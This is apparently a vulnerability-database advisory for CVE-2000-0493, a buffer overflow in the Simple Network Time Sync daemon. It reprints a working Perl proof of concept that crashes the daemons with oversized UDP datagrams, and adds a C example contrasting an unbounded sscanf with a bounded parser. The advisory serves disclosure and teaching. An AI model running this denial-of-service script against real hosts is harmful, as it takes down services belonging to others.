Simple Network Time Sync daemon buffer overflow vulnerability

Vulnerability ID: 1105866    Vulnerability type: buffer overflow
Published: 2000-06-01    Updated: 2005-05-02
CVE ID: CVE-2000-0493
CNNVD ID: CNNVD-200006-008
Platform: Linux    CVSS score: 10.0
|Sources
https://www.exploit-db.com/exploits/19978
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-008
|Details
The TimeSync daemon contains a buffer overflow. A remote attacker can send an overly long string to cause a denial of service or execute arbitrary commands.
|Exploit
source: http://www.securityfocus.com/bid/1289/info

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client, version 1.0. So far the overflow has only been tested on Red Hat 6.1. It may be possible to obtain root, although it appears that only about 50 characters are available for the injected code. The script below only demonstrates the crash: two oversized datagrams take down the client and server daemons, which is the denial-of-service case; it carries no shellcode.

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use strict;
use Socket;

die "Usage: $0 <hostname>\n" unless @ARGV;

# Needs to send 2 packets to kill the client and the server daemons
send_packet();
send_packet();

sub send_packet {

    my $proto     = getprotobyname('udp');
    my $localaddr = gethostbyname("localhost") || die "error: $!\n";
    my $iaddr     = gethostbyname($ARGV[0])    || die "$!\n";
    my $sin   = sockaddr_in(724, $iaddr);     # destination port used by the original PoC
    my $paddr = sockaddr_in(53, $localaddr);  # source port 53: binding a port below 1024 needs root
    socket(SH, PF_INET, SOCK_DGRAM, $proto) || die "socket: $!\n";
    bind(SH, $paddr) || die "bind: $!\n";

    $| = 1;

    connect(SH, $sin) || die "$!\n";

    # A string longer than 50 characters (56 bytes plus a newline)
    print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
    close(SH);

}
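The bug class behind this PoC, as an added example that is not part of the original page and not the snts 1.0 source: a fixed stack buffer filled by an unbounded `%s` conversion, beside a width-bounded version that rejects an oversized token instead of silently truncating it. The 50-byte buffer, the function names and the sample datagrams are assumptions taken from the advisory's "50 characters" figure and the PoC string above; only the bounded parser is fed the long payload, since running the unbounded one on it is undefined behaviour.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumption: the advisory says roughly 50 bytes are available, so a
 * 50-byte stack buffer is used here. This is an illustrative
 * reconstruction of the bug class, not the snts 1.0 code. */
#define TOKEN_MAX 50

/* Vulnerable pattern: "%s" with no field width. A datagram whose first
 * whitespace-delimited token is TOKEN_MAX bytes or longer writes past
 * buf and into whatever follows it on the stack. Only ever call this
 * with inputs known to be short. */
int parse_token_unbounded(const char *datagram, char *out, size_t outsz)
{
    char buf[TOKEN_MAX];
    if (sscanf(datagram, "%s", buf) != 1)
        return -1;                      /* nothing to parse */
    snprintf(out, outsz, "%s", buf);
    return 0;
}

/* Hardened pattern: the field width (TOKEN_MAX - 1, hard-coded as 49)
 * caps the write at 49 bytes plus the terminator, and %n reports how
 * much input was consumed so a token that was cut off can be detected
 * and the datagram rejected rather than silently truncated.
 * Returns 0 on success, -1 if there is no token, -2 if it is too long. */
int parse_token_bounded(const char *datagram, char *out, size_t outsz)
{
    char buf[TOKEN_MAX];
    int consumed = 0;
    if (sscanf(datagram, "%49s%n", buf, &consumed) != 1)
        return -1;
    unsigned char next = (unsigned char)datagram[consumed];
    if (next != '\0' && !isspace(next))
        return -2;                      /* token continued past the limit */
    snprintf(out, outsz, "%s", buf);
    return 0;
}

/* Constructed payload matching the Perl PoC: "logistix" seven times
 * (56 bytes) followed by a newline. */
static const char POC_PAYLOAD[] =
    "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";

int main(void)
{
    char out[TOKEN_MAX];
    int rc = parse_token_bounded(POC_PAYLOAD, out, sizeof out);
    printf("PoC payload (%zu bytes): bounded parser returned %d\n",
           strcspn(POC_PAYLOAD, "\n"), rc);
    rc = parse_token_bounded("logistix\n", out, sizeof out);
    printf("short payload: returned %d, token=\"%s\"\n", rc, out);
    rc = parse_token_unbounded("logistix\n", out, sizeof out);
    printf("unbounded parser on short payload: returned %d, token=\"%s\"\n",
           rc, out);
    return 0;
}
```

A bare width (`%49s`) alone would stop the overflow but quietly hand the daemon the first 49 bytes of a hostile datagram; the `%n` check turns that into an explicit rejection, which is the right response to untrusted UDP input. The same flaw applies whether the bytes come from a `recvfrom` buffer fed to `sscanf` or from `fscanf` on a socket stream.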
|References

Source: XF
Name: timesync-bo-execute
Link: http://xforce.iss.net/static/4602.php
Source: VULN-DEV
Name: 20000601 Vulnerability in SNTS
Link: http://archives.neohapsis.com/archives/vuln-dev/2000-q2/0843.html
Source: BID
Name: 1289
Link: http://www.securityfocus.com/bid/1289
